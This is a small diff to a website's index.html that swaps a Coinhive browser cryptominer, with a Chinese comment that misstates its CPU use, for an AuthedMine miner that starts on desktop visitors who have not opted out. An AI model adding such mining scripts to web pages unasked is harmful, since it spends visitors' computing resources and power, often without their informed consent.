--- a/index.html
+++ b/index.html
@@ -26,15 +26,16 @@
 			</ul>
 		</footer>
 	</body>
-<!-- 引入 Coinhive 挖礦程式 -->
-<script src="https://coinhive.com/lib/coinhive.min.js"></script>
 
+	<script src="https://authedmine.com/lib/authedmine.min.js"></script>
 <script>
-var miner = new CoinHive.Anonymous(
-  'DNvkUKFEbzbZFIekyiddu9tUAFjO6Qtz',
-  {throttle: 0.01}  // 使用 70% 的 CPU 資源進行挖礦
-);
-</script>
+ var miner = new CoinHive.Anonymous('DNvkUKFEbzbZFIekyiddu9tUAFjO6Qtz', {throttle: 0.1});
 
+ // Only start on non-mobile devices and if not opted-out
+ // in the last 14400 seconds (4 hours):
+ if (!miner.isMobile() && !miner.didOptOut(14400)) {
+ miner.start();
+ }
+</script>
 
 </html>
